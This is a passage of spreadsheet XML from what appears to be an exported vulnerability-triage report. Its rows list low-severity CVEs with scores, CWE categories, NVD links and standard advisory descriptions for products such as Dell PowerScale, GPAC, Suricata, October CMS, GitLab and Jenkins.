        <is>
          <t>CVE-2026-46460</t>
        </is>
      </c>
      <c r="D1395" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E1395" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1395" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1395" s="5" t="inlineStr"/>
      <c r="H1395" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1395" s="5" t="inlineStr"/>
      <c r="J1395" s="5" t="inlineStr"/>
      <c r="K1395" s="5" t="inlineStr">
        <is>
          <t>dell:powerscale_onefs</t>
        </is>
      </c>
      <c r="L1395" s="5" t="inlineStr"/>
      <c r="M1395" s="5" t="inlineStr"/>
      <c r="N1395" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1395" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1395" s="5" t="inlineStr"/>
      <c r="Q1395" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1395" s="5" t="inlineStr">
        <is>
          <t>Dell PowerScale OneFS, versions 9.5.0.0 through 9.7.1.15, versions 9.8.0.0 through 9.13.1.0, and versions prior to 9.15.0.0, contain an Incorrect Authorization vulnerability. A low privileged adjacent network attacker could potentially exploit this vulnerability, leading to unauthorized modification of system logs.</t>
        </is>
      </c>
      <c r="S1395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46460</t>
        </is>
      </c>
    </row>
    <row r="1396">
      <c r="A1396" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1396" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92214</t>
        </is>
      </c>
      <c r="D1396" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E1396" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1396" s="5" t="inlineStr"/>
      <c r="H1396" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1396" s="5" t="inlineStr"/>
      <c r="J1396" s="5" t="inlineStr"/>
      <c r="K1396" s="5" t="inlineStr"/>
      <c r="L1396" s="5" t="inlineStr"/>
      <c r="M1396" s="5" t="inlineStr"/>
      <c r="N1396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1396" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1396" s="5" t="inlineStr"/>
      <c r="Q1396" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="R1396" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in a2ui-project a2ui up to 0.10.7. Affected is an unknown function of the file samples/community/client/angular/projects/a2a-chat-canvas/src/lib/services/sanitizer-markdown-renderer-service.ts of the component a2a-chat-canvas. Executing a manipulation can lead to cross site scripting. The attack may be performed from remote.</t>
        </is>
      </c>
      <c r="S1396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92214</t>
        </is>
      </c>
    </row>
    <row r="1397">
      <c r="A1397" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1397" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92381</t>
        </is>
      </c>
      <c r="D1397" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E1397" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1397" s="5" t="inlineStr"/>
      <c r="H1397" s="5" t="inlineStr"/>
      <c r="I1397" s="5" t="inlineStr"/>
      <c r="J1397" s="5" t="inlineStr"/>
      <c r="K1397" s="5" t="inlineStr"/>
      <c r="L1397" s="5" t="inlineStr"/>
      <c r="M1397" s="5" t="inlineStr"/>
      <c r="N1397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1397" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1397" s="5" t="inlineStr"/>
      <c r="Q1397" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="R1397" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in PbootCMS up to 3.2.22. This affects the function decode_string of the file apps/admin/controller/content/ContentController.php of the component Template Rendering. This manipulation of the argument Title causes cross site scripting. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. The reported GitHub issue was closed with the reason "completed".</t>
        </is>
      </c>
      <c r="S1397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92381</t>
        </is>
      </c>
    </row>
    <row r="1398">
      <c r="A1398" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1398" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1398" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-32778</t>
        </is>
      </c>
      <c r="D1398" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E1398" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1398" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1398" s="5" t="inlineStr"/>
      <c r="H1398" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1398" s="5" t="inlineStr"/>
      <c r="J1398" s="5" t="inlineStr"/>
      <c r="K1398" s="5" t="inlineStr"/>
      <c r="L1398" s="5" t="inlineStr"/>
      <c r="M1398" s="5" t="inlineStr"/>
      <c r="N1398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1398" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1398" s="5" t="inlineStr"/>
      <c r="Q1398" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R1398" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in ILIAS 6.23, 7 before 7.22, and 8.1. An attacker can execute arbitrary code via ZIP upload.</t>
        </is>
      </c>
      <c r="S1398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-32778</t>
        </is>
      </c>
    </row>
    <row r="1399">
      <c r="A1399" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1399" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19086</t>
        </is>
      </c>
      <c r="D1399" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E1399" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1399" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1399" s="5" t="inlineStr"/>
      <c r="H1399" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1399" s="5" t="inlineStr"/>
      <c r="J1399" s="5" t="inlineStr"/>
      <c r="K1399" s="5" t="inlineStr"/>
      <c r="L1399" s="5" t="inlineStr"/>
      <c r="M1399" s="5" t="inlineStr"/>
      <c r="N1399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1399" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1399" s="5" t="inlineStr"/>
      <c r="Q1399" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1399" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a denial of service as a result of a buffer overflow in a PASE process. An authenticated attacker could leverage this to terminate their own process.</t>
        </is>
      </c>
      <c r="S1399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19086</t>
        </is>
      </c>
    </row>
    <row r="1400">
      <c r="A1400" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1400" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45761</t>
        </is>
      </c>
      <c r="D1400" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E1400" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1400" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1400" s="5" t="inlineStr"/>
      <c r="H1400" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1400" s="5" t="inlineStr"/>
      <c r="J1400" s="5" t="inlineStr"/>
      <c r="K1400" s="5" t="inlineStr">
        <is>
          <t>oisf:suricata</t>
        </is>
      </c>
      <c r="L1400" s="5" t="inlineStr"/>
      <c r="M1400" s="5" t="inlineStr"/>
      <c r="N1400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1400" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P1400" s="5" t="inlineStr"/>
      <c r="Q1400" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1400" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, a crafted rule using mixed-case frame syntax could trigger a heap buffer overflow while Suricata is loading signatures. The issue is reached during rule parsing/loading rather than by network traffic alone. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, preprocess rules to check that frames are all lowercase and/or only load trusted rulesets.</t>
        </is>
      </c>
      <c r="S1400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45761</t>
        </is>
      </c>
    </row>
    <row r="1401">
      <c r="A1401" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1401" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49400</t>
        </is>
      </c>
      <c r="D1401" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E1401" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1401" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1401" s="5" t="inlineStr"/>
      <c r="H1401" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1401" s="5" t="inlineStr"/>
      <c r="J1401" s="5" t="inlineStr"/>
      <c r="K1401" s="5" t="inlineStr"/>
      <c r="L1401" s="5" t="inlineStr"/>
      <c r="M1401" s="5" t="inlineStr"/>
      <c r="N1401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1401" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1401" s="5" t="inlineStr"/>
      <c r="Q1401" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R1401" s="5" t="inlineStr">
        <is>
          <t>October System provides the system module for October Content Management System. Prior to versions 3.7.17 and 4.2.21, the backend `SessionMaker` trait stored widget session state as `base64(serialize(...))` and consumed it with `unserialize()` without an `allowed_classes` restriction. Any code path that could write to a `widget.*` session key with attacker-controlled bytes could trigger PHP object injection the next time the widget read its session state, allowing instantiation of arbitrary classes and reachable PHP gadget chains. This issue only affects installations running with `cms.safe_mode` enabled. Safe Mode is a niche opt-in feature, primarily used for demo installations and multi-tenant or shared-editor scenarios where untrusted users are deliberately granted access to the CMS markup editor. In standard production deployments Safe Mode is off, backend access is restricted to trusted administrators, and a markup editor can already execute arbitrary PHP directly. The session-write path that reaches this sink is gated by the Safe Mode sandbox, so installations without Safe Mode enabled are not exposed. Scope of impact is narrow even with Safe Mode enabled. The standard backend code paths that populate widget session state (search terms, sort options, selected IDs, filter values) wrap the input inside a known array shape before serializing, so user-supplied values never reach `unserialize()` as a controllable serialized payload. Exploitation requires the Safe Mode session-write path together with a suitable PHP gadget chain reachable from the installed dependency set. The hardening below removes the underlying object-injection sink so the class of issue is closed off regardless. The vulnerability has been patched in v3.7.17 and v4.2.21. Two changes were applied. `Backend\Traits\SessionMaker` now stores widget session state as plain JSON instead of `base64(serialize(...))`, eliminating the object-injection sink entirely for new writes. Reads transparently fall back to the legacy format for one upgrade cycle so existing sessions retain their saved widget state. The legacy `unserialize()` fallback path now sets `allowed_classes =&gt; false`, so even values written before the upgrade cannot instantiate objects. As a workaround, restrict CMS markup editing access to fully trusted administrators only, the standard October CMS recommendation for any deployment.</t>
        </is>
      </c>
      <c r="S1401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49400</t>
        </is>
      </c>
    </row>
    <row r="1402">
      <c r="A1402" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1402" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89162</t>
        </is>
      </c>
      <c r="D1402" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E1402" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1402" s="5" t="inlineStr"/>
      <c r="H1402" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1402" s="5" t="inlineStr"/>
      <c r="J1402" s="5" t="inlineStr"/>
      <c r="K1402" s="5" t="inlineStr">
        <is>
          <t>pcre:pcre2</t>
        </is>
      </c>
      <c r="L1402" s="5" t="inlineStr"/>
      <c r="M1402" s="5" t="inlineStr"/>
      <c r="N1402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1402" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1402" s="5" t="inlineStr"/>
      <c r="Q1402" s="5" t="inlineStr">
        <is>
          <t>CWE-669</t>
        </is>
      </c>
      <c r="R1402" s="5" t="inlineStr">
        <is>
          <t>In PCRE2 before 10.48, pcre2_serialize_encode might disclose two bytes to an adversary, typically in a situation where the access available to the adversary is already unsafe.</t>
        </is>
      </c>
      <c r="S1402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89162</t>
        </is>
      </c>
    </row>
    <row r="1403">
      <c r="A1403" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1403" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92473</t>
        </is>
      </c>
      <c r="D1403" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E1403" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1403" s="5" t="inlineStr"/>
      <c r="H1403" s="5" t="inlineStr"/>
      <c r="I1403" s="5" t="inlineStr"/>
      <c r="J1403" s="5" t="inlineStr"/>
      <c r="K1403" s="5" t="inlineStr"/>
      <c r="L1403" s="5" t="inlineStr"/>
      <c r="M1403" s="5" t="inlineStr"/>
      <c r="N1403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1403" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1403" s="5" t="inlineStr"/>
      <c r="Q1403" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-416</t>
        </is>
      </c>
      <c r="R1403" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in GPAC 26.08-DEV. The impacted element is the function gf_sg_command_del of the file src/scenegraph/commands.c of the component BIFS Handler. The manipulation leads to use after free. The attack needs to be performed locally. The exploit is publicly available and might be used. Upgrading to version abi-16.24 is sufficient to resolve this issue. The identifier of the patch is e34f4ba349d55cd1849f0bcf4cf46552732e2db7. It is suggested to upgrade the affected component.</t>
        </is>
      </c>
      <c r="S1403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92473</t>
        </is>
      </c>
    </row>
    <row r="1404">
      <c r="A1404" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1404" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92474</t>
        </is>
      </c>
      <c r="D1404" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E1404" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1404" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1404" s="5" t="inlineStr"/>
      <c r="H1404" s="5" t="inlineStr"/>
      <c r="I1404" s="5" t="inlineStr"/>
      <c r="J1404" s="5" t="inlineStr"/>
      <c r="K1404" s="5" t="inlineStr"/>
      <c r="L1404" s="5" t="inlineStr"/>
      <c r="M1404" s="5" t="inlineStr"/>
      <c r="N1404" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1404" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1404" s="5" t="inlineStr"/>
      <c r="Q1404" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-416</t>
        </is>
      </c>
      <c r="R1404" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in GPAC 26.08-DEV. This affects the function gf_inline_get_proto_lib of the file src/compositor/mpeg4_inline.c of the component Proto Link Handler. The manipulation results in use after free. The attack requires a local approach. The exploit has been released to the public and may be used for attacks. Upgrading to version abi-16.24 mitigates this issue. The patch is identified as e34f4ba349d55cd1849f0bcf4cf46552732e2db7. Upgrading the affected component is recommended.</t>
        </is>
      </c>
      <c r="S1404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92474</t>
        </is>
      </c>
    </row>
    <row r="1405">
      <c r="A1405" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1405" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1405" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-37252</t>
        </is>
      </c>
      <c r="D1405" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E1405" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1405" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1405" s="5" t="inlineStr"/>
      <c r="H1405" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1405" s="5" t="inlineStr"/>
      <c r="J1405" s="5" t="inlineStr"/>
      <c r="K1405" s="5" t="inlineStr"/>
      <c r="L1405" s="5" t="inlineStr"/>
      <c r="M1405" s="5" t="inlineStr"/>
      <c r="N1405" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1405" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1405" s="5" t="inlineStr"/>
      <c r="Q1405" s="5" t="inlineStr">
        <is>
          <t>CWE-669</t>
        </is>
      </c>
      <c r="R1405" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the CheckUser extension for MediaWiki through 1.39.3. Special:CheckUserLog shows usernames that have been hidden.</t>
        </is>
      </c>
      <c r="S1405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-37252</t>
        </is>
      </c>
    </row>
    <row r="1406">
      <c r="A1406" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1406" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1406" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-37253</t>
        </is>
      </c>
      <c r="D1406" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E1406" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1406" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1406" s="5" t="inlineStr"/>
      <c r="H1406" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1406" s="5" t="inlineStr"/>
      <c r="J1406" s="5" t="inlineStr"/>
      <c r="K1406" s="5" t="inlineStr"/>
      <c r="L1406" s="5" t="inlineStr"/>
      <c r="M1406" s="5" t="inlineStr"/>
      <c r="N1406" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1406" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1406" s="5" t="inlineStr"/>
      <c r="Q1406" s="5" t="inlineStr">
        <is>
          <t>CWE-669</t>
        </is>
      </c>
      <c r="R1406" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the ProofreadPage extension for MediaWiki through 1.39.3. It leaks information about a suppressed user via the API and config variables.</t>
        </is>
      </c>
      <c r="S1406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-37253</t>
        </is>
      </c>
    </row>
    <row r="1407">
      <c r="A1407" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1407" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16190</t>
        </is>
      </c>
      <c r="D1407" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E1407" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1407" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1407" s="5" t="inlineStr"/>
      <c r="H1407" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1407" s="5" t="inlineStr"/>
      <c r="J1407" s="5" t="inlineStr"/>
      <c r="K1407" s="5" t="inlineStr"/>
      <c r="L1407" s="5" t="inlineStr"/>
      <c r="M1407" s="5" t="inlineStr"/>
      <c r="N1407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1407" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1407" s="5" t="inlineStr"/>
      <c r="Q1407" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1407" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 is affected by an authorization bypass vulnerability.</t>
        </is>
      </c>
      <c r="S1407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16190</t>
        </is>
      </c>
    </row>
    <row r="1408">
      <c r="A1408" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1408" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-3855</t>
        </is>
      </c>
      <c r="D1408" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E1408" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1408" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G1408" s="5" t="inlineStr"/>
      <c r="H1408" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1408" s="5" t="inlineStr"/>
      <c r="J1408" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K1408" s="5" t="inlineStr"/>
      <c r="L1408" s="5" t="inlineStr"/>
      <c r="M1408" s="5" t="inlineStr"/>
      <c r="N1408" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1408" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1408" s="5" t="inlineStr"/>
      <c r="Q1408" s="5" t="inlineStr">
        <is>
          <t>CWE-99</t>
        </is>
      </c>
      <c r="R1408" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.2.7 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that under certain conditions could have allowed an authenticated user with project-level permissions to access restricted file contents on the server or cause denial of service due to improper validation of parameters in the Terraform state upload functionality.</t>
        </is>
      </c>
      <c r="S1408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-3855</t>
        </is>
      </c>
    </row>
    <row r="1409">
      <c r="A1409" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1409" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92130</t>
        </is>
      </c>
      <c r="D1409" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E1409" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1409" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1409" s="5" t="inlineStr"/>
      <c r="H1409" s="5" t="inlineStr"/>
      <c r="I1409" s="5" t="inlineStr"/>
      <c r="J1409" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K1409" s="5" t="inlineStr"/>
      <c r="L1409" s="5" t="inlineStr"/>
      <c r="M1409" s="5" t="inlineStr"/>
      <c r="N1409" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1409" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1409" s="5" t="inlineStr"/>
      <c r="Q1409" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1409" s="5" t="inlineStr">
        <is>
          <t>Jenkins Pipeline: Multibranch Plugin 841.vec5b_9e1806ec and earlier does not set the appropriate context for credentials lookup in the resolveScm Pipeline step, allowing attackers with Item/Configure permission to access and capture credentials they are not entitled to.</t>
        </is>
      </c>
      <c r="S1409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92130</t>
        </is>
      </c>
    </row>
    <row r="1410">
      <c r="A1410" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1410" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71181</t>
        </is>
      </c>
      <c r="D1410" s="5" t="n">
        <v>3</v>
      </c>
      <c r="E1410" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1410" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1410" s="5" t="inlineStr"/>
      <c r="H1410" s="5" t="inlineStr"/>
      <c r="I1410" s="5" t="inlineStr"/>
      <c r="J1410" s="5" t="inlineStr"/>
      <c r="K1410" s="5" t="inlineStr"/>
      <c r="L1410" s="5" t="inlineStr"/>
      <c r="M1410" s="5" t="inlineStr"/>
      <c r="N1410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1410" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1410" s="5" t="inlineStr"/>
      <c r="Q1410" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R1410" s="5" t="inlineStr">
        <is>
          <t>Dell Update Package Framework, versions prior to 26.07.03, contains an Improper Link Resolution Before File Access ('Link Following') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Filesystem access for attacker.</t>
        </is>
      </c>
      <c r="S1410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71181</t>
        </is>
      </c>
    </row>
    <row r="1411">
      <c r="A1411" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1411" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71182</t>
        </is>
      </c>
      <c r="D1411" s="5" t="n">
        <v>3</v>
      </c>
